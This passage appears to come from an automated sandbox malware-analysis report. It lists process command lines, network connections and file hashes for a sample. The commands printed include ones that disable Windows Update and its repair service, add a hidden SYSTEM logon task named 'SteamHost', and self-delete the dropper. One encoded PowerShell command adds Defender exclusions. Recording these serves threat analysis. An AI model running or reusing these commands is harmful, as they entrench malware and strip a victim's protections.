Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

Network

Country Destination Domain Proto
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp

Files

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 fa0429acc4b9cfd414d24fae0e299790
SHA1 80d76038b5401080e18e6b015cbf806d9abe8589
SHA256 1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
SHA512 f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

MD5 76764afd7b394cd6a9c36fa16d4c88fc
SHA1 5274a18139edf134230252c97652bfa6319b1a78
